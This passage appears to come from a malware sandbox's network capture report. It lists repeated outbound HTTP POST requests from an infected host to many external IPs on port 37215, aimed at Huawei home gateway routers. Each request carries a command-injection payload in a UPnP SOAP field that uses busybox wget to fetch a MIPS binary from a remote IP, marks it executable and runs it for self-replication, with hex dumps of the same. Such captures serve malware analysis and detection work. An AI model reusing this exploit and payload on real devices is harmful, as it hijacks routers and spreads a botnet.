6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  854192.168.2.1350832193.226.18.7237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.422123909 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  855192.168.2.1348322157.78.24.15237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.422135115 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  856192.168.2.135189441.80.2.13437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.422168970 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  857192.168.2.1349598157.20.51.13137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.422194958 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  858192.168.2.1352236157.11.185.137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.422199965 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  859192.168.2.1351978197.246.204.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.422205925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  860192.168.2.1343596197.79.247.25237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.422297955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  861192.168.2.1334268197.70.93.637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.434678078 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  862192.168.2.1345704193.42.46.22337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.434890032 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  863192.168.2.1352478197.168.236.19337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.434967995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  864192.168.2.1333602197.171.90.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.435040951 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
